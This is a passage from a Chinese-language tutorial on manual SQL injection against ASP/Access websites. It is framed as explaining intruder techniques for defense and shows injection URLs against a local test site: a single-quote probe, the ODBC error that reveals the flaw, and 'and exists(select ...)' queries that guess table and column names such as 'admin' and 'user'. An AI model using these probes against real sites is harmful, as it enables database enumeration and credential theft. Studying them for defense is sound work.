安全攻略access篇：从手工注入看防御

　　不过很多时候入侵者只需用一个单引号即可快速判断出目标站点是否存在SQL注入漏洞，向浏览器提交如下url:

　　http://127.0.0.1/111/view.asp?id=198’如果返回如下信息则说明有一半机会以上存在注入漏洞:

　　Microsoft OLE DB Provider for ODBC Drivers 错误’80040e14’

　　[Microsoft] [ODBC Microsoft Access Driver]字符串的语法错误在查询表达式’id =1’’中。/list.asp,行50

　　4.此时入侵者开始构造特殊的SQL查询语句开始查询站点数据库的表名，向url提交如下语句:

　　http://127.0.0.1/111/view.asp?id=198 and exists(select * from admin)

　　这个语句是向数据库查询是否存在admin这个表，如果存在则返回正常页面，如果不存在此表则返回出错页面。一般入侵者会先测试常用的表名，也是一般的注入工具密码字典内存在的表名和字段名。如果表名不在常用表名中则入侵者就会结合社会工程学来猜解表名，这种情况下入侵者猜中表名的几率较低。

[1] [2] 下一页

5.入侵者在得到表名后开始构造查询语句查询数据库字段名，向url提交如下语句:

　　http://127.0.0.1/111/view.asp?id=198 and exists(select user from admin)